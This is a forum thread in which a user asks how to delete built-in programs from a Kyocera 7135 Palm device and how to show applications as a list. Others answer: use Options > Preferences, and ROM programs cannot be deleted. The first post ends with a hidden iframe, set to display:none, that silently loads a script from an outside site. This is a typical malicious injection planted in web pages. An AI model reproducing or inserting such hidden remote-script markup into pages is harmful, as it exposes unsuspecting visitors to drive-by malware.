+ Reply to Thread
    I-300 Novice

Program Deletions

This is probably a Palm forum question, so if it is something that is not proper to ask on this forum, please let me know and delete this thread.

With my I-300, I used to be able to go to a screen which listed all of my applications and delete anything I wanted.

With the 7135, I mistakenly installed Silver Screen. I wanted to delete the 'Browser', 'EIS' and 'SilverScreen programs, as I already have too many icons and will never use them.

When I went to delete them with through the File Manager, I kept getting a pop-up message saying that they couldn't be deleted. Is there another way I should be deleting programs? Is there something I should be doing on my desktop to make sure that the programs don't get reloaded when I hotsync?

The other question is how to get the main screen to display all of the programs in a list without all of the icons. I hate having to scroll through all of the icons. I found a way to get the listing on my I-300 when I was tinkering around with it one day (only God knows what I did) and I can't figure out how to do it on the 7135.

Any help on either of the above items will be greatly appreciated.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Ahmed V. Ismail
    A Smartphone Addict

Re: Program Deletions

Originally posted by PHCismail
    . . . The other question is how to get the main screen to display all of the programs in a list without all of the icons. I hate having to scroll through all of the icons. I found a way to get the listing on my I-300 when I was tinkering around with it one day (only God knows what I did) and I can't figure out how to do it on the 7135.

Any help on either of the above items will be greatly appreciated.
    When in your main screen showing icons, tap on the options icon in your graffiti section - the pull down menu graphic in the lower left corner. Then go to Options and then preferences. Once there you can choose to "View By" icon or list.

I-300 Novice
    Thanks Larch...it worked! I have my listing rather than all of the mega icons.

When I click on the 'time' in the upper left hand corner of the main screen, then click on 'delete', it tells me, "There are no add-on applications that can be deleted". Are programs like 'Eudora', 'Tetris', 'PhotSuite' not deletable?

You guys are all awesome!
    Ahmed V. Ismail
    A Smartphone Addict

Some of the programs are in the ROM not the RAM, and therefore cannot be deleted.